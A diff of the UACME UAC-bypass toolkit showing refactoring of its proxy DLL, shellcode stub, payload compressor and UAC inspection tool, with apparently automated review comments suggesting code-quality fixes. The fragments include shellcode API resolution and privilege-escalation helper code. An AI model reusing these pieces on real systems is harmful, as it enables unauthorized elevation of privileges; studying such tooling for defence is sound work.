+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)32.dll
+
@@ -181,6 +191,7 @@
false
CompileAsC
MultiThreadedDLL
+ $(SolutionDir)
Windows
@@ -192,6 +203,9 @@
true
export.def
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)64.dll
+
diff --git a/Source/Ikazuchi/Ikazuchi.vcxproj.user b/Source/Ikazuchi/Ikazuchi.vcxproj.user
new file mode 100644
index 0000000..abe8dd8
--- /dev/null
+++ b/Source/Ikazuchi/Ikazuchi.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/Source/Ikazuchi/dllmain.c b/Source/Ikazuchi/dllmain.c
index 78db019..ac8241c 100644
--- a/Source/Ikazuchi/dllmain.c
+++ b/Source/Ikazuchi/dllmain.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2016
+* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.50
+* VERSION: 2.57
*
-* DATE: 07 July 2016
+* DATE: 07 Mar 2017
*
* Proxy dll entry point, Ikazuchi.
*
@@ -29,10 +29,10 @@
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include
-#include "..\Shared\ntos.h"
+#include "shared\ntos.h"
#include
-#include "..\shared\minirtl.h"
-#include "..\Shared\_filename.h"
+#include "shared\minirtl.h"
+#include "shared\_filename.h"
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@@ -43,16 +43,27 @@
#endif
#endif
-#define T_AKAGI_KEY L"Software\\Akagi"
-#define T_AKAGI_PARAM L"LoveLetter"
-#define COMCTL32_SXS L"microsoft.windows.common-controls"
-#define COMCTL32_DLL L"comctl32.dll"
+#define T_SXS_DIRECTORY L"\\\\?\\globalroot\\systemroot\\winsxs\\"
+#define SXS_DIRECTORY_LENGTH sizeof(T_SXS_DIRECTORY) - sizeof(WCHAR)
+
+#define T_REGISTRY_USER L"\\REGISTRY\\USER\\"
+#define REGISTRY_USER_LENGTH sizeof(T_REGISTRY_USER) - sizeof(WCHAR)
+
+#define T_AKAGI_KEY L"Software\\Akagi"
+#define AKAGI_KEY_LENGTH sizeof(T_AKAGI_KEY) - sizeof(WCHAR)
+
+#define T_COMCTL32_SLASH L"\\comctl32.dll"
+#define COMCTL32_SLASH_LENGTH sizeof(T_COMCTL32_SLASH) - sizeof(WCHAR)
+
+#define T_AKAGI_PARAM L"LoveLetter"
+#define COMCTL32_SXS L"microsoft.windows.common-controls"
+#define COMCTL32_DLL L"comctl32.dll"
typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
typedef struct _OBJSCANPARAM {
PWSTR Buffer;
- ULONG BufferSize;
+ SIZE_T BufferSize;
} OBJSCANPARAM, *POBJSCANPARAM;
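Review bot: The new `*_LENGTH` macros expand to a bare `sizeof(X) - sizeof(WCHAR)`, so they are only correct where they appear as a term in a sum; `n * SXS_DIRECTORY_LENGTH` or `x - AKAGI_KEY_LENGTH` would silently compute something else. Parenthesize each expansion, e.g. `#define SXS_DIRECTORY_LENGTH (sizeof(T_SXS_DIRECTORY) - sizeof(WCHAR))`, and note in a comment that the value is a byte count that excludes the terminator. `REGISTRY_USER_LENGTH` and `AKAGI_KEY_LENGTH` are defined a second time, with the same problem, in Source/Akagi/tests/test.c; moving them to a shared header would stop the copies drifting apart.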
typedef struct _SXS_SEARCH_CONTEXT {
@@ -179,6 +190,7 @@ NTSTATUS NTAPI supDetectObjectCallback(
_In_ PVOID CallbackParam
)
{
+ SIZE_T BufferSize;
POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
if (Entry == NULL) {
@@ -189,16 +201,17 @@ NTSTATUS NTAPI supDetectObjectCallback(
return STATUS_INVALID_PARAMETER_2;
}
- if (Param->Buffer == NULL || Param->BufferSize == 0) {
- return STATUS_MEMORY_NOT_ALLOCATED;
- }
-
if (Entry->Name.Buffer) {
- _strncpy(
- Param->Buffer, Param->BufferSize / sizeof(WCHAR),
- Entry->Name.Buffer, Param->BufferSize / sizeof(WCHAR)
- );
- return STATUS_SUCCESS;
+ BufferSize = Entry->Name.Length + sizeof(UNICODE_NULL);
+ Param->Buffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, BufferSize);
+ if (Param->Buffer) {
+ Param->BufferSize = BufferSize;
+ _strncpy(
+ Param->Buffer, Param->BufferSize / sizeof(WCHAR),
+ Entry->Name.Buffer, Entry->Name.Length / sizeof(WCHAR)
+ );
+ return STATUS_SUCCESS;
+ }
}
return STATUS_UNSUCCESSFUL;
}
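Review bot: After this change the callback allocates `Param->Buffer` itself, which hands ownership of the block to whoever supplied `CallbackParam`, but nothing in the visible lines documents that. Extend the routine's header comment with something like `On success Param->Buffer is allocated from the process heap; the caller releases it with RtlFreeHeap`. The callback also overwrites `Param->Buffer` without looking at its previous value, so a caller that still pre-fills the struct, as the removed code required, would leak its buffer. A comment stating that `Param->Buffer` must be NULL on entry would make the new contract explicit. The function's opening lines are outside this hunk.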
@@ -327,15 +340,18 @@ HRESULT WINAPI TaskDialogIndirectForward(
if (lpszDirectoryName == NULL)
break;
- sz = 0x1000 + (_strlen(lpszDirectoryName) * sizeof(WCHAR));
+ sz = SXS_DIRECTORY_LENGTH + COMCTL32_SLASH_LENGTH + ((1 + _strlen(lpszDirectoryName)) * sizeof(WCHAR));
NtAllocateVirtualMemory(NtCurrentProcess(), &lpSxsPath, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (lpSxsPath == NULL)
break;
- _strcpy(lpSxsPath, L"\\\\?\\globalroot\\systemroot\\winsxs\\");
+ _strcpy(lpSxsPath, T_SXS_DIRECTORY);
_strcat(lpSxsPath, lpszDirectoryName);
- _strcat(lpSxsPath, L"\\comctl32.dll");
+ _strcat(lpSxsPath, T_COMCTL32_SLASH);
+ DllName.Buffer = NULL;
+ DllName.Length = 0;
+ DllName.MaximumLength = 0;
RtlInitUnicodeString(&DllName, lpSxsPath);
if (NT_SUCCESS(LdrLoadDll(NULL, NULL, &DllName, &hLib))) {
if (hLib) {
@@ -389,39 +405,34 @@ BOOL ucmQueryCustomParameter(
STARTUPINFOW startupInfo;
PROCESS_INFORMATION processInfo;
ULONG bytesIO = 0L;
-
- WCHAR szBuffer[MAX_PATH * 2];
OBJSCANPARAM Param;
do {
- RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
- Param.Buffer = szBuffer;
- Param.BufferSize = sizeof(szBuffer);
+ Param.Buffer = NULL;
+ Param.BufferSize = 0;
status = supEnumSystemObjects(L"\\Rpc Control\\Akagi", NULL,
supDetectObjectCallback, &Param);
if (!NT_SUCCESS(status))
break;
- RtlSecureZeroMemory(&usKey, sizeof(usKey));
- RtlInitUnicodeString(&usKey, szBuffer);
-
- memIO = 0x1000 + (_strlen(szBuffer) * sizeof(WCHAR));
+ if ((Param.Buffer == NULL) || (Param.BufferSize == 0))
+ break;
+ memIO = MAX_PATH + Param.BufferSize + REGISTRY_USER_LENGTH + AKAGI_KEY_LENGTH;
lpszParamKey = RtlAllocateHeap(ProcessHeap, HEAP_ZERO_MEMORY, memIO);
if (lpszParamKey == NULL)
break;
- _strcpy_w(lpszParamKey, L"\\REGISTRY\\USER\\");
- _strcat_w(lpszParamKey, usKey.Buffer);
+ _strcpy_w(lpszParamKey, T_REGISTRY_USER);
+ _strcat_w(lpszParamKey, Param.Buffer);
_strcat_w(lpszParamKey, L"\\");
_strcat_w(lpszParamKey, T_AKAGI_KEY);
RtlSecureZeroMemory(&usKey, sizeof(usKey));
RtlInitUnicodeString(&usKey, lpszParamKey);
InitializeObjectAttributes(&obja, &usKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
-
status = NtOpenKey(&hKey, KEY_ALL_ACCESS, &obja);
if (!NT_SUCCESS(status)) {
break;
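Review bot: `memIO` adds `MAX_PATH`, which is a character count, to three byte counts, so the allocation is only large enough because those 260 spare bytes happen to cover the `L"\\"` separator that the sum leaves out. Spell out what is actually concatenated instead: `memIO = REGISTRY_USER_LENGTH + Param.BufferSize + sizeof(WCHAR) + AKAGI_KEY_LENGTH;`, where `Param.BufferSize` already includes the terminator. The same expression is copied into `UACMeTest` in Source/Akagi/tests/test.c and should change with it. ucmQueryCustomParameter starts and ends outside this hunk.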
@@ -473,6 +484,9 @@ BOOL ucmQueryCustomParameter(
NtDeleteKey(hKey);
NtClose(hKey);
}
+ if (Param.Buffer != NULL) {
+ RtlFreeHeap(ProcessHeap, 0, Param.Buffer);
+ }
if (lpszParamKey != NULL) {
RtlFreeHeap(ProcessHeap, 0, lpszParamKey);
}
diff --git a/Source/Ikazuchi/version.rc b/Source/Ikazuchi/version.rc
index ba9896d..5f89e12 100644
Binary files a/Source/Ikazuchi/version.rc and b/Source/Ikazuchi/version.rc differ
diff --git a/Source/Inazuma/Inazuma.vcxproj b/Source/Inazuma/Inazuma.vcxproj
index 7831693..de3b0c6 100644
--- a/Source/Inazuma/Inazuma.vcxproj
+++ b/Source/Inazuma/Inazuma.vcxproj
@@ -46,6 +46,7 @@
$(ProjectName)32
false
SecurityRules.ruleset
+ false
false
@@ -53,18 +54,20 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
false
- SecurityRules.ruleset
+ AllRules.ruleset
+ false
- Level3
+ Level4
Disabled
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
false
+ $(SolutionDir)
Windows
@@ -74,7 +77,7 @@
- Level3
+ Level4
MaxSpeed
@@ -85,6 +88,7 @@
false
Size
+ $(SolutionDir)
Windows
diff --git a/Source/Inazuma/main.c b/Source/Inazuma/main.c
index b4db12d..d5f7373 100644
--- a/Source/Inazuma/main.c
+++ b/Source/Inazuma/main.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2015
+* (C) COPYRIGHT AUTHORS, 2015 - 2017
*
* TITLE: MAIN.C
*
-* VERSION: 1.90
+* VERSION: 2.57
*
-* DATE: 16 Sept 2015
+* DATE: 06 Mar 2017
*
* ShellCode.
*
@@ -21,7 +21,7 @@
#pragma warning(disable: 4005) // macro redefinition
#include
-#include "..\Shared\ntos.h"
+#include "shared\ntos.h"
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@@ -35,6 +35,14 @@
typedef HMODULE(WINAPI *pfnLoadLibraryA)(LPCSTR lpLibFileName);
typedef DWORD(WINAPI *pfnExpandEnvironmentStringsA)(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize);
+/*
+* gethash
+*
+* Purpose:
+*
+* Used in shellcode, calculates specific hash for string.
+*
+*/
DWORD gethash(char *s)
{
DWORD h = 0;
@@ -48,6 +56,14 @@ DWORD gethash(char *s)
return h;
}
+/*
+* rawGetProcAddress
+*
+* Purpose:
+*
+* GetProcAddress small implementation for shellcode.
+*
+*/
PVOID rawGetProcAddress(PVOID Module, DWORD hash)
{
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Module;
@@ -69,6 +85,14 @@ PVOID rawGetProcAddress(PVOID Module, DWORD hash)
return NULL;
}
+/*
+* main
+*
+* Purpose:
+*
+* Shellcode entry point.
+*
+*/
void main()
{
PTEB teb = (PTEB)__readfsdword(0x18);
diff --git a/Source/Naka/Naka.vcxproj b/Source/Naka/Naka.vcxproj
index bf8062a..48099ca 100644
--- a/Source/Naka/Naka.vcxproj
+++ b/Source/Naka/Naka.vcxproj
@@ -88,14 +88,14 @@
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
- SecurityRules.ruleset
+ AllRules.ruleset
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
- SecurityRules.ruleset
+ AllRules.ruleset
@@ -105,6 +105,7 @@
Disabled
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
+ $(SolutionDir)
Windows
@@ -120,6 +121,7 @@
Disabled
_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
+ $(SolutionDir)
Windows
@@ -138,6 +140,7 @@
WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
+ $(SolutionDir)
Windows
@@ -147,6 +150,9 @@
true
main
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)32.exe
+
@@ -159,6 +165,7 @@
NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
+ $(SolutionDir)
Windows
@@ -168,6 +175,9 @@
true
main
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)64.exe
+
diff --git a/Source/Naka/main.c b/Source/Naka/main.c
index 4d75829..097c148 100644
--- a/Source/Naka/main.c
+++ b/Source/Naka/main.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2016
+* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: MAIN.C
*
-* VERSION: 2.51
+* VERSION: 2.57
*
-* DATE: 10 July 2016
+* DATE: 07 Mar 2017
*
* Naka, support payload compressor.
*
@@ -41,10 +41,10 @@
#include
#include
-#include "..\shared\ntos.h"
-#include "..\shared\minirtl.h"
-#include "..\Shared\cmdline.h"
-#include "..\Shared\_filename.h"
+#include "shared\ntos.h"
+#include "shared\minirtl.h"
+#include "shared\cmdline.h"
+#include "shared\_filename.h"
ULONG g_XorKey = 'naka';
@@ -189,6 +189,7 @@ PUCHAR CompressBufferLZNT1(
if (status != STATUS_SUCCESS) {
VirtualFree(CompBuffer, 0, MEM_RELEASE);
+ CompBuffer = NULL;
break;
}
diff --git a/Source/Shared/ntos.h b/Source/Shared/ntos.h
index 401fc79..b989ec7 100644
--- a/Source/Shared/ntos.h
+++ b/Source/Shared/ntos.h
@@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.59
+* VERSION: 1.60
*
-* DATE: 28 Feb 2017
+* DATE: 02 Mar 2017
*
* Common header file for the ntos API functions and definitions.
*
@@ -5202,6 +5202,89 @@ NTSTATUS NTAPI RtlQueryElevationFlags(
** UAC Elevation END
*/
+
+/*
+* Memory parition START
+*/
+
+typedef enum _MEMORY_PARTITION_INFORMATION_CLASS {
+ SystemMemoryPartitionInformation = 0,
+ SystemMemoryPartitionMoveMemory = 1,
+ SystemMemoryPartitionAddPagefile = 2,
+ SystemMemoryPartitionCombineMemory = 3,
+ SystemMemoryPartitionInitialAddMemory = 4
+} MEMORY_PARTITION_INFORMATION_CLASS;
+
+typedef struct _MEMORY_PARTITION_PAGE_RANGE {
+ ULONG_PTR StartPage;
+ ULONG_PTR NumberOfPages;
+} MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE;
+
+typedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION {
+ ULONG Flags;
+ ULONG NumberOfRanges;
+ ULONG_PTR NumberOfPagesAdded;
+ MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1];
+} MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION;
+
+typedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION {
+ PVOID StopHandle;
+ ULONG Flags;
+ ULONG_PTR TotalNumberOfPages;
+} MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION;
+
+typedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION {
+ UNICODE_STRING PageFileName;
+ LARGE_INTEGER MinimumSize;
+ LARGE_INTEGER MaximumSize;
+ ULONG Flags;
+} MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION;
+
+typedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION {
+ ULONG_PTR NumberOfPages;
+ ULONG NumaNode;
+ ULONG Flags;
+} MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION;
+
+typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION {
+ ULONG Flags;
+ ULONG NumaNode;
+ ULONG Channel;
+ ULONG NumberOfNumaNodes;
+ ULONG_PTR ResidentAvailablePages;
+ ULONG_PTR CommittedPages;
+ ULONG_PTR CommitLimit;
+ ULONG_PTR PeakCommitment;
+ ULONG_PTR TotalNumberOfPages;
+ ULONG_PTR AvailablePages;
+ ULONG_PTR ZeroPages;
+ ULONG_PTR FreePages;
+ ULONG_PTR StandbyPages;
+} MEMORY_PARTITION_CONFIGURATION_INFORMATION, *PMEMORY_PARTITION_CONFIGURATION_INFORMATION;
+
+NTSTATUS NTAPI NtOpenPartition(
+ _Out_ PHANDLE PartitionHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes
+ );
+
+NTSTATUS NTAPI NtManagePartition(
+ _In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
+ _Inout_ PVOID PartitionInformation,
+ _In_ ULONG PartitionInformationLength
+ );
+
+NTSTATUS NTAPI NtCreatePartition(
+ _Out_ PHANDLE PartitionHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ ULONG PreferredNode
+ );
+
+/*
+* Memory partition END
+*/
+
/*
** Native API START
*/
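Review bot: The opening banner of the new section is misspelled, `* Memory parition START`, while the closing one reads `Memory partition END`, so a search for the section markers misses the start. Both banners also use a single `*` where the neighbouring ones use `**`. `PartitionRanges[1]` in MEMORY_PARTITION_INITIAL_ADD_INFORMATION looks like a variable-length tail counted by NumberOfRanges; a comment such as `/* NumberOfRanges entries follow; size the allocation accordingly */` would stop callers from passing `sizeof` the struct for more than one range. NtManagePartition as declared takes no partition handle, although NtOpenPartition and NtCreatePartition each return one, so the prototype is worth checking against the target builds before anything calls it.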
diff --git a/Source/Yuubari/Resource.rc b/Source/Yuubari/Resource.rc
index 31dba56..3e4811a 100644
Binary files a/Source/Yuubari/Resource.rc and b/Source/Yuubari/Resource.rc differ
diff --git a/Source/Yuubari/Yuubari.vcxproj b/Source/Yuubari/Yuubari.vcxproj
index 74a8bbb..8427e7c 100644
--- a/Source/Yuubari/Yuubari.vcxproj
+++ b/Source/Yuubari/Yuubari.vcxproj
@@ -64,6 +64,7 @@
_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
+ $(ProjectDir)
Console
@@ -86,6 +87,7 @@
MultiThreaded
Guard
true
+ $(ProjectDir)
Console
diff --git a/Source/Yuubari/appinfo.c b/Source/Yuubari/appinfo.c
index 591c5ab..67eb936 100644
--- a/Source/Yuubari/appinfo.c
+++ b/Source/Yuubari/appinfo.c
@@ -4,9 +4,9 @@
*
* TITLE: APPINFO.C
*
-* VERSION: 1.10
+* VERSION: 1.21
*
-* DATE: 19 Feb 2017
+* DATE: 04 Mar 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -30,18 +30,14 @@ pfnSymUnloadModule64 pSymUnloadModule64 = NULL;
pfnSymFromAddrW pSymFromAddrW = NULL;
pfnSymCleanup pSymCleanup = NULL;
-//
-// Should be = supported Windows builds
-//
#define SUPPORTED_PATTERNS_COUNT 6
-
UAC_PATTERN g_MmcPatterns[SUPPORTED_PATTERNS_COUNT] = {
{ ptMmcBlock_7600, sizeof(ptMmcBlock_7600), 7600, 7600 },
{ ptMmcBlock_7601, sizeof(ptMmcBlock_7601), 7601, 7601 },
{ ptMmcBlock_9200, sizeof(ptMmcBlock_9200), 9200, 9200 },
{ ptMmcBlock_9600, sizeof(ptMmcBlock_9600), 9600, 9600 },
{ ptMmcBlock_10240, sizeof(ptMmcBlock_10240), 10240, 10240 },
- { ptMmcBlock_10586_15046, sizeof(ptMmcBlock_10586_15046), 10586, 15046 }
+ { ptMmcBlock_10586_15048, sizeof(ptMmcBlock_10586_15048), 10586, 15048 }
};
#define TestChar(x) ((x >= L'A') && (x <= L'z'))
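Review bot: This hunk deletes the only comment on `SUPPORTED_PATTERNS_COUNT` while the table is still sized by a hand-maintained `6`. The old wording was misleading, since the last entry covers a range of builds, but the constant still needs an explanation, for example `// Number of entries in g_MmcPatterns; keep in sync with the initializer list.` The range entry now encodes its upper build in three places: the identifier `ptMmcBlock_10586_15048`, the `sizeof` argument and the max-build field. A name without the upper bound would leave only the numeric field to bump on each new build. The array initializer continues to the closing brace inside the hunk, but the code that consumes the min/max fields is not visible here.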
diff --git a/Source/Yuubari/consts.h b/Source/Yuubari/consts.h
index 46c0321..eefdc70 100644
--- a/Source/Yuubari/consts.h
+++ b/Source/Yuubari/consts.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.20
+* VERSION: 1.21
*
-* DATE: 01 Mar 2017
+* DATE: 02 Mar 2017
*
* Global consts definition file.
*
@@ -33,7 +33,7 @@
#define T_FLAG_INSTALLERDETECT_ENABLED TEXT("InstallerDetectEnabled")
#define T_PROGRAM_NAME TEXT("Yuubari")
-#define T_PROGRAM_TITLE TEXT("[UacView] UAC information gathering tool, v1.2.0 (01/03/2017)\n")
+#define T_PROGRAM_TITLE TEXT("[UacView] UAC information gathering tool, v1.2.1 (02/03/2017)\n")
#define T_HELP TEXT("Optional parameters to execute: \n\n\r\
YUUBARI [/v] \n\n\r\
diff --git a/Source/Yuubari/main.c b/Source/Yuubari/main.c
index a65e2c9..246eb3b 100644
--- a/Source/Yuubari/main.c
+++ b/Source/Yuubari/main.c
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
-* VERSION: 1.20
+* VERSION: 1.21
*
-* DATE: 01 Mar 2017
+* DATE: 07 Mar 2017
*
* Program entry point.
*
diff --git a/Source/Yuubari/patterns.h b/Source/Yuubari/patterns.h
index 0b4d273..a72b370 100644
--- a/Source/Yuubari/patterns.h
+++ b/Source/Yuubari/patterns.h
@@ -4,15 +4,15 @@
*
* TITLE: PATTERNS.H
*
-* VERSION: 1.20
+* VERSION: 1.21
*
-* DATE: 01 Mar 2017
+* DATE: 04 Mar 2017
*
* Patterns for supported AppInfo versions.
*
* Minimum client: 7600
*
-* Maximum client: 15046
+* Maximum client: 15048
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -41,7 +41,7 @@ unsigned char ptMmcBlock_9600[] = {
unsigned char ptMmcBlock_10240[] = {
0x49, 0x8B, 0x14, 0x24, 0x49, 0x8B, 0xCE, 0xFF, 0x15
};
-unsigned char ptMmcBlock_10586_15046[] = {
+unsigned char ptMmcBlock_10586_15048[] = {
0x49, 0x8B, 0x16, 0x49, 0x8B, 0xCD, 0xFF, 0x15
};
diff --git a/Source/Yuubari/tests/test_fusion.c b/Source/Yuubari/tests/test_fusion.c
index 8022839..7f02aac 100644
--- a/Source/Yuubari/tests/test_fusion.c
+++ b/Source/Yuubari/tests/test_fusion.c
@@ -4,9 +4,9 @@
*
* TITLE: TEST_FUSION.C
*
-* VERSION: 1.10
+* VERSION: 1.21
*
-* DATE: 20 Feb 2017
+* DATE: 03 Mar 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -14,8 +14,8 @@
* PARTICULAR PURPOSE.
*
*******************************************************************************/
-#include "..\global.h"
-#include "..\fusion.h"
+#include "global.h"
+#include "fusion.h"
BYTE TestArray[1024 * 32] = { 0 };
diff --git a/Source/uacme.sln b/Source/uacme.sln
index fc6d2c8..05a2ebd 100644
--- a/Source/uacme.sln
+++ b/Source/uacme.sln
@@ -22,6 +22,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "shared", "shared", "{49552A
Shared\cmdline.c = Shared\cmdline.c
shared\minirtl.h = shared\minirtl.h
shared\ntos.h = shared\ntos.h
+ Shared\ntsxs.h = Shared\ntsxs.h
shared\rtltypes.h = shared\rtltypes.h
Shared\strtoul.c = Shared\strtoul.c
EndProjectSection
diff --git a/UACME.sha256 b/UACME.sha256
index f1b668c..7c58e16 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -1,8 +1,8 @@
-2b2fcde2f1ae5876945bd2ec066016d18d9461a99eca70b5a1c597a95575ccd7 *Compiled\Akagi32.exe
-8e9687f9d47757e9c97f17d2e4f05cdd5810ff696290261da8ce9dd1ae505e4f *Compiled\Akagi64.exe
-bc7b0c12581633eae06b6f5c4ac6d97a8ad061383e6909f43037856a497b3138 *Compiled\UacInfo64.exe
+c3aadb6fb35a7bcf5855706b10e993f068828417ab7d3e12da90f0ad7b70f1f2 *Compiled\Akagi32.exe
+38149f3b29758b855354bab50beb4e910cce9f2b5cfa393e940e4618eaf1cb76 *Compiled\Akagi64.exe
+b6566783e023d055c31830ce754ea806cc3e4da856dc016264db16013cd8929d *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
-9a7fcbc8cbd7b8a875f828e45f1813847c9daa52bbe63864154f71ed53a056fb *Source\uacme.sln
+39cd224f1349523f193b0bd95ccae5d6ee31dbd625aae5b4ab91cca2bdeb69c7 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
270efb0d86f638f7978ceeeacdcd8addc793933b8915c193623c4e9efedfb05d *Source\Akagi\apphelp.h
@@ -13,78 +13,81 @@ b5158a54a382d5d219af835d6664525b54bc30bbb4999ed73741a4731e8db040 *Source\Akagi\b
65ca05df060b36704e38db08c0c56a358c4c73145a690f0713bb1c5560fc0a98 *Source\Akagi\carberp.c
35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h
3163a5938ab4f15082f0960e30f39d29bd5a120e692134db8a7da2ea6c6b1978 *Source\Akagi\comet.c
-ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h
-f08a3e73e61836aa5a77441f75f6c0798512b5e949f84aa2caef0646c70005b4 *Source\Akagi\compress.c
+888f884ca226ac9c1f615496f70fd4e9e03976f40de3a4026b4f9cdbc92347d9 *Source\Akagi\comet.h
+b8e8bcfcec9529c1aa34bb1d1b19e66f7ef157962e65eb390c54705accc78126 *Source\Akagi\compress.c
be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h
27c861254f565093f5b30d03640121bb3bd4a8d0e7b4b627dc33eee0e8dc8f2e *Source\Akagi\consts.h
-b91747dbb9928504618194423d1d2d0a32f7fd2c4d0233778bc48c121ba98ba2 *Source\Akagi\enigma0x3.c
+6081ff03b89f37e46e378ce0258336ad5451fc821c4fc7da5ddfa5c92b5db0cd *Source\Akagi\enigma0x3.c
362c2c8c0aeb6ed6396fffb1d06f5b83ac03b74c75845da0cab4702311863520 *Source\Akagi\enigma0x3.h
-682b685196d19eaaecdd73f371515cea13ef67ae34dd1f6ecb3d711e29e0e42f *Source\Akagi\explife.c
+425bd2ffc4dcd71ed5dac01f31236cdc80ab5ca5c77e211b3c58c48adead3da6 *Source\Akagi\explife.c
f4315ba7926b6a73a497b1dad53bb47509f43fb20009cee051ca065f41cb3417 *Source\Akagi\explife.h
-a06795ff3509f2d02a6e3ca3e675d306e7c9669e6b87e6e1d2f14d6f149245e3 *Source\Akagi\global.h
+ed2d2dd8f192251a608bb98d51f09bc2f792494c79330d6d9184e1806e3513bc *Source\Akagi\global.h
5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c
c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
-f166daea90a02bd9ba0fbbfae26c668a470f680a5ed752bdd4052fb82ef78b7c *Source\Akagi\hybrids.c
+49458af00933874313d878e3c223473c10eff60a3e79d209967eee8a78d9a344 *Source\Akagi\hybrids.c
81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h
-220dd784ef9475bbeb21f7ecb9c54acfd571f8c420dc7e0c6dd632694261ab3b *Source\Akagi\main.c
+78598dd659978dd673739cefac448aeb5bb6799692c5f23ba36300115f9d43ae *Source\Akagi\main.c
dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c
67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h
d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h
795a325be6a31be7d91d09c230a00b2503ad061080fb494ae49c532a283d7bb8 *Source\Akagi\pitou.c
1f4be768fd390a3c8f80a326f10bf626c01da4e70cf89c46139dc64c8425647f *Source\Akagi\pitou.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
-e81122b88e1574515722554f2edddde13db239fc21617fe7a78a8827d6ea07fb *Source\Akagi\Resource.rc
